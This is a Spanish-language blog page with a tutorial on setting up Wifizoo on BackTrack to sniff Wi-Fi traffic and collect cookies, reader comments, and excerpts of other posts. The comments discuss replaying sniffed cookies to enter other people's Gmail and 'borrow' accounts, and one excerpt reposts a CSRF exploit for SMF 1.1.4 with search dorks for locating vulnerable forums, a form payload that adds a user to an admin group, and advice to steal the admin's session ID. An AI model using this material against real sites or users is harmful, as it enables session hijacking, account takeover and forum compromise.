Ir al contenido principal

Instalando, Configurando y Usando Wifizoo

Bueno aqui el manual para que vean la instalacion configuracion y uso de wifizoo:

Primero descargaremos el paquete desde aqui:

http://community.corest.com/~hochoa/wifizoo/index.html#download

despues lo instalamos con:

installpkg wifizoo_v1.2.tgz

ya que este lo movemos a la carpeta /pentest/wireless/

despues de eso necesitamos tambien scappy

lo descargamos desde aqui:

http://www.secdev.org/projects/scapy/

lo movemos a la carpeta:

/pentest/wireless/wifizoo_v1.2

tendremos algo como esto dentro de la carpeta:



editamos el archivo wifizoo.py para seleccionar nuestra tarjeta en mi caso ath0, y nos quedara algo asi (se puede editar con nano,kwrite, cualquier editor de texto que uds quieran):



creamos la carpeta ./logs en /root

despues de eso corremos wifizoo asi:

[code]bt wifizoo_v1.2 # python wifizoo.py[/code]



entramos a http://127.0.0.1:8000 // aqui es donde se hace el gui para wifizoo



esperamos a capturar nuestras cookies:



y despues de eso entramos al directorio de cookies (ya que se hayan capturado unas claro esta)



and....



Komtec1

Comentarios

Carlos ha dicho que…
tal komtek oye, se que es un poco tarde, pero apenas leí tu post sobre el wifizoo, me gustaría saber como identificar la cookie que obtienes para entrar por ejemplo a gmail, te comento esto por que yo eche a andar el wifizoo en una maquina virtual mientras que en windows navegué por mis correos, al terminar y revisar el GUI de wifizoo encontre con muchas cookies de gmail que quise cargar, pero que al parecer ninguna funciono ya que me redirigia a google y al entrar a gmail me pedía mis datos de entrada (correo y contraseña) te agradecería mucho si me pudieras orientar en esto.
Komtec1 ha dicho que…
mmm ahi tenemos un pequeño problema jejeje xD no se bien bien la estructura de la cookie, por lo que probe antes con varias, y al final cuando hice el video la tenia ubicada por la sintaxis, deja cheko el video de nuevo y revisamos esa parte xDDDD jejejeje y ya te contacto por aqui giles.14[at]gmail[dot]com o publico un post aqui en el mismo blog

Saludos :-D
Carlos ha dicho que…
jeje, gracias tu checale, sobre que distribución corriste el wifizoo?
Komtec1 ha dicho que…
sobre backtrack bro :-D todos los manuales que tengo los tengo en backtrack :-D
Usuarios Firefox ha dicho que…
Wifizoo esta incluido en Russix live cd,
con respecto al uso de la informacion que muestra de las cookies (http://127.0.0.1:8000/showcookies)
alguien tiene alguna info de como aprovecharlas.
Carlos ha dicho que…
Pues para aprovecharlas solo necesitas estar esnifando a alguien que este usando su gmail por ejemplo, montas la cookie y despues solo entras a gmail.com y listo estaras dentro de su correo (esto es en teoría) ya que yo no lo he podido hacer, por alguna razón las cookies si me las monta pero no puedo acceder al gmail como debería de ser me pide mi usuario y contraseña
Komtec1 ha dicho que…
@Usuarios Firefox:

las puedes aprovechar en cualquier pagina que maneje cookies y quieras tomar una cuenta "prestada"

@Carlos

no entra a la cuenta ya que solo es una cookie la valida, perdon tu fuiste quien puso la primera pregunta, estoy super ocupado con el trabajo en la oficina y no he tenido tiempo de poner una respuesta concreta, ahora que tenga una hora libre de seguro contesto jejej xD Saludos y gracias por visitar el blog :-D
Carlos ha dicho que…
Que tal komtec, no te apures, esperemos pronto tengas un ratito. He seguido intentando y nada y eso que esnifo mis propias cookies jaja, trabajo bajo windows y un VM con backtrack donde corro el wifizoo pero no mas nada jaja, captura un buen pero no puedo utilizar la correcta, por cierto no sabras como borrar las cookies que me capturo antes? es que las estuve buscando pero nunca las encontre pero en el GUI de wifizoo me las muestra aun que las haya esnifado un mes atras
Komtec1 ha dicho que…
las puedes borrar en la carpeta ./logs creada en root :-D

Saludos

Entradas populares de este blog

Solución [fix] a hamachi Logging in .. failed, busy

Hola!

Aquí con una pequeña entrada, pero que a más de uno le será útil.

Tengo hamachi instalado en varias máquinas, pero en una precisamente al reiniciar, algunas veces me da este problema:

usuarioserver@server:~$ sudo hamachi login
[sudo] password for usuarioserver:
Logging in .. failed, busy

Lo busqué en internet y la "solución" que dan, es reinstalar hamachi, y para los que han instalado hamachi en ubuntu, saben que no es una opción, pues se tendrían que hacer estos pasos: 
sudo apt-get remove logmein-hamachi sudo dpkg -i logmein-hamachixxx.deb sudo apt-get install -f
Para lo cual (siempre) es molesto hacer esos pasos, y algunas veces la configuración se llega a perder. 
Para solucionar ese problema, basta con hacer un: 
sudo /etc/init.d/logmein-hamachi force-reload
Esto forzará el reinicio de hamachi, y así después hacen: 
sudo hamachi login
Y listo, el problema de failed busy desaparece y los deja loguear bien en la red de hamachi. 
Espero les sirva! :D 
Saludos 
Komtec…

Integrar API de Google Maps, archivos kml, kmz y otras fumarolas :D

Ya que andamos en eso de la posteada ahora les voy a dejar un pequeño manual sobre como integrar la API de maps (google) dentro de nuestro código, hay varia documentación en la página developers de google, pero realmente lo que uno busca cuando pone en google: "integrar api de maps" es ver un ejemplo claro y directo para que se pueda entender de mejor forma.

Así que pues ya comentada la información de arriba les paso a dejar un ejemplo.

Lo primero que tenemos que poner en nuestro código es la llamada a la API de maps:


<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?sensor=false&language=es"></script>En este caso la variable sensor está en false, esto nos indica que no hay un dispositivo gps que pueda tomar la ubicación (se pone generalmente en true cuando es para aplicación movil, llámese celular o tableta)El lenguaje declaramos español, esto es para los menús que se van a mostrar en el mapa. Una vez que tenemo…

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| …